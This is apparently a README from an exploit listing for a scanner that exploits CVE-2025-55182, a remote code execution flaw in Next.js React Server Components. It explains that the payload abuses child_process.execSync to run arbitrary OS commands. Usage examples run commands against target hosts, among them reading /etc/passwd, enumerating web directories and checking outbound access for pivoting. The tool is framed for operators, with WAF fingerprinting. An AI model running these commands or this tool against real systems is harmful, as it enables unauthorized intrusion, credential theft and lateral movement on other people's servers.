Share
## https://sploitus.com/exploit?id=EBDD005C-4A80-5B6C-8D03-0B1A6176E192
CVE-2025-55182 Advanced Scanner
A full-featured exploitation utility for CVE-2025-55182 โ Remote Code Execution via React Server Components in Next.js.
The scanner automatically crafts the multipart payload and abuses process.mainModule.require('child_process').execSync() to achieve arbitrary OS command execution on vulnerable instances.
Features
Auto payload generator โ no manual encoding required
Command execution with clean STDOUT extraction
Automatic protocol detection (https:// applied if missing)
Proper URL decoding + newline restoration
Colored rich output for quick operator feedback
Error fingerprinting (500 / 403 / SSL / timeout / WAF patterns)
Installation
chmod +x scanner.sh
Usage
# Default scan (executes 'id')
./scanner.sh -d vulnerable-app.com
# Custom command execution
./scanner.sh -d vulnerable-app.com -c "whoami"
# With explicit protocol
./scanner.sh -d http://localhost:3000 -c "cat /etc/passwd"
Options
Examples
# Verify RCE
./scanner.sh -d shop.example.com
# System fingerprinting
./scanner.sh -d shop.example.com -c "uname -a"
# Enum writable paths
./scanner.sh -d shop.example.com -c "ls -la /var/www"
# Pivot helper โ check outbound access
./scanner.sh -d shop.example.com -c "ping -c 4 google.com"
Feel free to reach out on mailto:dev.vaibhavk@gmail.com